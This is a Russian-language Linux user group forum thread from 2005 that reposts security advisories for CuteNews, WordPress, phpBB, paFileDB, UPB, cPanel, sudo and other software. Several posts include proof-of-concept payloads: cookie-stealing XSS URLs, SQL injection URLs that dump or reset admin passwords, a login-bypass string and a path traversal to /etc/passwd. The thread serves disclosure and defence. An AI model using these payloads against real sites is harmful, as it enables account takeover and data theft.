Шахтинская Linux User Group. Поддержка пользователей Linux и Unix. Обмен дистрибутивами.

Модераторы: ShurShun, Vitas

Аватара пользователя
TOSHIK
Не в сети
Администратор
Администратор
Сообщения: 6596
Зарегистрирован: Пт авг 08, 2003 13:49
Откуда: Ростов-на-Дону
Контактная информация:

BugTraq

Сообщение TOSHIK »

В этой теме предлагаю размещать описания известных вам уязвимостей. Если вы наткнулись на описание уязвимости, то поделившись этой новостью вы наверняка поможете не одному человеку...
Последний раз редактировалось TOSHIK Пт июн 03, 2005 12:31, всего редактировалось 1 раз.
Активисты все еще ищутся здесь!

Аватара пользователя
TOSHIK
Не в сети
Администратор
Администратор
Сообщения: 6596
Зарегистрирован: Пт авг 08, 2003 13:49
Откуда: Ростов-на-Дону
Контактная информация:

XSS и загрузка произвольных файлов в CuteNews

Сообщение TOSHIK »

3 июня 2005

Программа: CuteNews все версии

Опасность: Высокая

Наличие эксплоита: Да

Описание:
Удаленный пользователь может произвести XSS нападение и выполнить произвольные команды на целевой системе.

1. Уязвимость существует из-за некорректной обработки данных в некоторых значениях URL. Удаленный пользователь может внедрить произвольный HTML-сценарий и получить файлы cookie, связанные с аутентификацией пользователя. Пример:

http://[target]/index.php?mod=editnews&action=editnews&id=[id]
&source=<script>alert(document.cookie);</script>

2. Авторизованный пользователь может загрузить и выполнить произвольный php-сценарий. Функция переименования изображений не проверяет имя входящего и исходящего файлов, что делает возможным загрузить gif/jpg-файл с комментарием в виде php-кода () с последующей сменой расширения. Кроме того, отсутствие фильтрации символов обхода каталога ("../") делает возможным загрузку злонамеренного файла на каталог выше относительно уязвимого скрипта при наличии соответственных прав доступа

Уязвимость нашел Че Гевара (http://antichat.ru)

URL производителя: cutephp.com

Решение: Способов устранения уязвимости не существует в настоящее время.
Активисты все еще ищутся здесь!

Аватара пользователя
TOSHIK
Не в сети
Администратор
Администратор
Сообщения: 6596
Зарегистрирован: Пт авг 08, 2003 13:49
Откуда: Ростов-на-Дону
Контактная информация:

SQL-инъекция в WordPress

Сообщение TOSHIK »

3 июня 2005

Программа: WordPress 1.5 и более ранние версии

Опасность: Средняя

Наличие эксплоита: Нет

Описание:
Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения.

Уязвимость существует при обработке входных данных в параметре cat_ID. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольные SQL команды в базе данных приложения.

URL производителя: wordpress.org

Решение: Установите последнюю версию (1.5.1.2) с сайта производителя.

Хорошая система. Приятно работает. Плохонько интегрируется правда, но все равно хорошая вещь. Осталось теперь еще отловить в ней все дыры и можно будет пользоваться.
Активисты все еще ищутся здесь!

Аватара пользователя
TOSHIK
Не в сети
Администратор
Администратор
Сообщения: 6596
Зарегистрирован: Пт авг 08, 2003 13:49
Откуда: Ростов-на-Дону
Контактная информация:

Сообщение TOSHIK »

6 июня 2005

Межсайтовый скриптинг в при обработке BBCODE URL в phpBB

Программа: phpBB версии до 2.0.15

Опасность: Низкая

Наличие эксплоита: Да

Описание:
Уязвимость позволяет удаленному пользователю произвести XSS нападение и получить доступ к потенциально важным данным других пользователей.

Уязвимость обнаружена при обработке BBCODE URL в сценарии bbcode.php. Удаленный пользователь может с помощью специально сформированного сообщения выполнить произвольный HTML сценарий в браузере жертвы в контексте безопасности уязвимого сайта. Примеры:

[url=javascript://%0ASh=alert(%22CouCou%22);
window.close();]Alert box with "CouCou"[/url]

[url=javascript://%0ASh=new%20ActiveXObject
(%22WScript.shell%22);Sh.regwrite(%22HKCU
%5C%5CQQQQQ%5C%5Cqq%22,%22CouCou
%22);window.close();]Create registry entry:
HKCU\QQQQQ\qq = "CouCou"[/url]

[url=javascript://%0Awindow.opener.document.body.
innerHTML=window.opener.document.body.innerHTML.
replace(%27Hi%20Paul%27,%27Hi%20P.A.U.L%27);
window.close();]Modify opener page: Paul -> P.A.U.L[/url]

URL производителя: www.phpbb.com

Решение: Установите последнюю версию (2.0.15) с сайта производителя.
Активисты все еще ищутся здесь!

Аватара пользователя
TOSHIK
Не в сети
Администратор
Администратор
Сообщения: 6596
Зарегистрирован: Пт авг 08, 2003 13:49
Откуда: Ростов-на-Дону
Контактная информация:

Сообщение TOSHIK »

10 июня 2005
SQL-инъекция в Loki Download Manager
Программа: Loki Download Manager 2.0

Опасность: Средняя

Наличие эксплоита: Да

Описание:
Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения.

Уязвимость существует в сценарии '/adm/default.asp' при обработке параметра password и в сценарии 'catinfo.asp' в параметре 'cat'. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения. Пример:

user: anyuser
pass: 'or''='

http://[target]/downmancv/catinfo.asp?cat=' union select
null,null,user,null,null,null,null,null,pass,nul l,null,null,null,null FROM
tblAdm '


Решение: Способов устранения уязвимости не существует в настоящее время.
Активисты все еще ищутся здесь!

Аватара пользователя
TOSHIK
Не в сети
Администратор
Администратор
Сообщения: 6596
Зарегистрирован: Пт авг 08, 2003 13:49
Откуда: Ростов-на-Дону
Контактная информация:

Сообщение TOSHIK »

10 июня 2005
Отказ в обслуживании в функциях ptrace() и mmap()в ядре Linux
Программа: Linux kernel 2.6

Опасность: Низкая

Наличие эксплоита: Нет

Описание:
Уязвимость позволяет локальному пользователю вызвать отказ в обслуживании системы.

1. Уязвимость существует в функции ptrace() на AMD64 системах в файле 'arch/x86_64/kernel/ptrace.c'. Локальный пользователь может аварийно завершить работу системы.

2. Ошибка в функции mmap() позволяет локальному пользователю создать некорректную карту памяти (memory map) и вызвать отказ в обслуживании.

URL производителя: www.kernel.org

Решение: Установите исправление (2.6.11.11) с сайта производителя.
Активисты все еще ищутся здесь!

Аватара пользователя
TOSHIK
Не в сети
Администратор
Администратор
Сообщения: 6596
Зарегистрирован: Пт авг 08, 2003 13:49
Откуда: Ростов-на-Дону
Контактная информация:

Сообщение TOSHIK »

17 июня 2005
Множественные уязвимости в paFileDB
Программа: paFileDB 3.1 и более ранние версии

Опасность:
Средняя

Наличие эксплоита: Да

Описание:
Обнаруженные уязвимости позволяют удаленному пользователю произвести XSS нападение, выполнить произвольные SQL команды в базе данных приложения, просмотреть и выполнить произвольные файлы на системе.

1. SQL-инъекция возможна из-за недостаточной обработки входных данных. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольные SQL команды в базе данных уязвимого приложения. Примеры:

http://[target]/pafiledb.php?action=admin&login=do&formname='%20UNION
%20SELECT%20admin_id,%20admin_username,%20'6f1ed002ab5595859014ebf095 1522d9',
%20admin_email,%20'1'%20FROM%20pafiledb_admin%20WHERE%20'1&formpass=blah&B1=
%3E%3E+Log+In+%3C%3C&action=admin&login=do

http://[target]/pafiledb.php?select= -99'%20UNION%20SELECT%200,admin_username,
admin_password,0,0,0,0%20FROM%20pafiledb_admin%20WHERE%201/*&B1=%3E%3E+Edit+
Category+%3C%3C&action=team&tm=category&category= edit&edit=form&menu1=%2F
pafiledb%2Fpafiledb.php%3Faction%3Dteam%26tm%3Dcategory%26category%3Dedit

http://[target]/pafiledb.php?id=-99'%20UNION%20SELECT%200,admin_use rname,
admin_password,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20FROM%20pafiledb_admin%20WHERE%
201/*&B1=%3E%3E+Edit+File+%3C%3C&action=team&tm=file&file=edit&edit=form&menu1
=%2 Fpafiledb%2Fpafiledb.php%3Faction%3Dteam%26tm%3Dfile%26file%3Dedit

http://[target]/pafiledb.php?action=team&tm=file&file=edit&id=1&edit=do&
query=UPDATE%20pafiledb_ad min%20SET%20admin_password%20=%20MD5%281337%28%
20WHERE%201/*


2. Уязвимость при обработке входных данных в параметре action сценария 'pafiledb.php' позволяет удаленному пользователю просмотреть и выполнить произвольные файлы на целевой системе. Пример:

http://[target]/pafiledb.php?action=../../../../etc/passwd%00&login=do

3. Межсайтовый скриптинг возможен из-за недостаточной фильтрации входных данных в некоторых параметрах. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольный HTML сценарий в браузере жертвы в контексте безопасности уязвимого сайта. Примеры:

http://[target]/pafiledb.php?ac tion=viewall&start=20&sortby=name%22
%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E

http://[target]/pafiledb.php?action=category&id=1&filelist=%22%3E%3C
sc ript%3Ealert%28document.cookie%29%3C%2Fscript%3E

http://[target]/pafiledb.php?action=category&id=1&pages=%22%3E
%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E

URL производителя: www.phparena.net/pafiledb.php

Решение: Установите последнюю версию с сайта производителя.
Активисты все еще ищутся здесь!

Аватара пользователя
TOSHIK
Не в сети
Администратор
Администратор
Сообщения: 6596
Зарегистрирован: Пт авг 08, 2003 13:49
Откуда: Ростов-на-Дону
Контактная информация:

Сообщение TOSHIK »

17 июня 2005
SQL-инъекция в socialMPN
Программа: socialMPN

Опасность:
Средняя

Наличие эксплоита: Да

Описание:
Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения и определить установочную директорию приложения на сервере.

Уязвимость существует из-за недостаточной проверки входных данных в нескольких переменных. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольные SQL команды в базе данных приложения и получить данные об установочной директории приложения на сервере. Пример:

http://[target]/article.php?sid=%27

http://[target]/use r.php?uname='&pass=1&op=login

http://[target]/viewforum.php?forum=43&siteid=%2527

http://[target]/newtopic.php?username='&password=

http://[target]/sections.php? op=listarticles&secid=%27

http://[target]/sections.php?op=listarticles&artid=%2527

http://[target]/index.php?siteid='&op=show&aftersid=380

http://[target]/friend .php?sid=%2527&yname=1&ymail=1
& fname=1&fmail=1&op=SendStory


URL производителя: www.socialmpn.com

Решение: Способов устранения уязвимости не существует в настоящее время.
Активисты все еще ищутся здесь!

Аватара пользователя
TOSHIK
Не в сети
Администратор
Администратор
Сообщения: 6596
Зарегистрирован: Пт авг 08, 2003 13:49
Откуда: Ростов-на-Дону
Контактная информация:

Сообщение TOSHIK »

20 июня 2005
Отказ в обслуживании в SpamAssassin при обработке заголовков сообщения
Программа: SpamAssassin 3.0.1, 3.0.2 и 3.0.3

Опасность:
Средняя

Наличие эксплоита: Нет

Описание:
Уязвимость позволяет удаленному пользователю вызвать отказ в обслуживании приложения.

Удаленный пользователь может послать целевой службе сообщение со специально сформированными заголовками, вследствие чего SpamAssassin понадобится большое количество ресурсов и времени для обработки этого сообщения.

URL производителя: spamassassin.apache.org

Решение: Установите последнюю версию (3.0.4) с сайта производителя.
Активисты все еще ищутся здесь!

Аватара пользователя
TOSHIK
Не в сети
Администратор
Администратор
Сообщения: 6596
Зарегистрирован: Пт авг 08, 2003 13:49
Откуда: Ростов-на-Дону
Контактная информация:

Сообщение TOSHIK »

20 июня 2005
Межсайтовый скриптинг в Ultimate PHP Board (UPB)
Программа: Ultimate PHP Board 1.9.6 GOLD и более ранние версии

Опасность:
Низкая

Наличие эксплоита: Да

Описание:
Уязвимость позволяет удаленному пользователю произвести XSS нападение и получить доступ к потенциально важным данным других пользователей.

Уязвимость обнаружена при обработке входных данных в различных сценариях. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольный HTML сценарий в браузере жертвы в контексте безопасности уязвимого сайта. Примеры:

http://[target]/upb/login.php?ref=%27%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://[target]/upb/viewtopic.php?id=%27%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://[target]/upb/viewtopic.php?id=1&t_id=1&page=%27%3E%3Cscript%3Ealert(d ocument.cookie)%3C/script%3E

http://[target]/upb/profile.php?action=get&id=%27%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://[target]/upb/newpost.php?id= 1&t=1&t_id=%27%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://[target]/upb/newpost.php?id=%27%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://[ta rget]/upb/email.php?id=%27%3E%3Cscript%3Ealert(document.cookies)%3C/script%3E

http://[target]/upb/icq.php?action=get&id=%27%3E%3Cscript%3Ealert(document.cookie)%3C/scr ipt%3E

http://[target]/upb/aol.php?action=get&id=%27%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://[target]/upb/getpass.php?ref=%27%3E%3Cscript%3Ealert(d ocument.cookie)%3C/script%3E

http://[target]/upb/search.php?step=3&sText=%27%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

Удаленный пользователь может также получить потенциально важную информацию о пользователях и узнать установочную директорию приложения. Примеры:

http://[target]/upb/db/users.dat

http://[target]/upb/viewtopic.php?id=0

http://[target]/upb/profile.php?action=get&id=0

http://[target]/upb/newpost.php?t_id=0

URL производителя: www.myupb.com

Решение: Способов устранения уязвимости не существует в настоящее время.
Активисты все еще ищутся здесь!

Аватара пользователя
TOSHIK
Не в сети
Администратор
Администратор
Сообщения: 6596
Зарегистрирован: Пт авг 08, 2003 13:49
Откуда: Ростов-на-Дону
Контактная информация:

Сообщение TOSHIK »

20 июня 2005
SQL-инъекция в Mambo
Программа: Mambo 4.5.2.2 и более ранние версии

Опасность:
Средняя

Наличие эксплоита: Нет

Описание:
Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения.

Уязвимость обнаружена в 'com_contents' в сценарии 'content.php' из-за недостаточной обработки входных данных в параметре 'user_rating'. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.

URL производителя: www.mamboserver.com

Решение: Установите последнюю версию (4.5.2.3) с сайта производителя.
Активисты все еще ищутся здесь!

Аватара пользователя
TOSHIK
Не в сети
Администратор
Администратор
Сообщения: 6596
Зарегистрирован: Пт авг 08, 2003 13:49
Откуда: Ростов-на-Дону
Контактная информация:

Сообщение TOSHIK »

20 июня 2005
Межсайтовый скриптинг и обход ограничений безопасности в браузере Opera
Программа: Opera 8.0 и более ранние версии

Опасность:
Низкая

Наличие эксплоита: Нет

Описание:
Уязвимость позволяет удаленному пользователю произвести XSS нападение и получить доступ к потенциально важным данным других пользователей.

1. Уязвимость существует при обработке "javascript:" ссылок при открытии нового окна или фрейма. Удаленный пользователь может с помощью специально сформированной ссылки выполнить произвольный HTML сценарий в браузере жертвы в контексте безопасности уязвимого сайта.

2. Обход ограничений безопасности при обработке объекта XMLHttpRequest позволяет злоумышленнику создать специально сформированную страницу и получить доступ к другим открытым страницам за пределами данного домена. Злоумышленник может изменить содержимое открытых страниц и потенциально получить доступ к важной информации пользователей.

URL производителя: www.opera.com

Решение: Установите последнюю версию (8.01) с сайта производителя.
Активисты все еще ищутся здесь!

Аватара пользователя
TOSHIK
Не в сети
Администратор
Администратор
Сообщения: 6596
Зарегистрирован: Пт авг 08, 2003 13:49
Откуда: Ростов-на-Дону
Контактная информация:

Сообщение TOSHIK »

23 июня 2005
Межсайтовый скриптинг в cPanel
Программа: cPanel 10.2.0-R82 и более ранние версии

Опасность:
Низкая

Наличие эксплоита: Нет

Описание:
Уязвимость позволяет удаленному пользователю произвести XSS нападение и получить доступ к потенциально важным данным других пользователей.

Уязвимость существует из-за недостаточной фильтрации входных данных в параметре ‘user’ сценария cpsrvd.pl. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольный HTML сценарий в браузере жертвы в контексте безопасности уязвимого сайта. Пример:

http://[host]:2082/login?user=**

Код: Выделить всё

[/i]

[b]URL производителя:[/b] www.cpanel.net

[b]Решение:[/b] Способов устранения уязвимости не существует в настоящее время.
Активисты все еще ищутся здесь!

Аватара пользователя
TOSHIK
Не в сети
Администратор
Администратор
Сообщения: 6596
Зарегистрирован: Пт авг 08, 2003 13:49
Откуда: Ростов-на-Дону
Контактная информация:

Сообщение TOSHIK »

21 июня 2005
Раскрытие информации в RealVNC
Программа: RealVNC 4

Опасность:
Низкая

Наличие эксплоита: Нет

Описание:
Уязвимость позволяет удаленному пользователю получить доступ к системной информации.

Удаленный пользователь может создать нулевую сессию к хосту и получить информацию о целевой системе, например версию ОС.

URL производителя: www.realvnc.com

Решение: Способов устранения уязвимости не существует в настоящее время.
Активисты все еще ищутся здесь!

Аватара пользователя
TOSHIK
Не в сети
Администратор
Администратор
Сообщения: 6596
Зарегистрирован: Пт авг 08, 2003 13:49
Откуда: Ростов-на-Дону
Контактная информация:

Сообщение TOSHIK »

21 июня 2005
Уязвимость состояния операции в sudo
Программа: sudo 1.3.1 - 1.6.8p8

Опасность:
Низкая

Наличие эксплоита: Нет

Описание:
Обнаруженная уязвимость позволяет локальному пользователю выполнить произвольные команды на целевой системе.

При некоторых обстоятельствах локальный пользователь может выполнить произвольные команды на системе. Если в файле sudoers содержится запись ‘ALL’ после записи, относящейся к учетной записи злоумышленника, локальный пользователь может выполнить произвольные команды на системе.

URL производителя: www.sudo.ws

Решение: Установите последнюю версию (1.6.8p9) с сайта производителя.
Активисты все еще ищутся здесь!

Ответить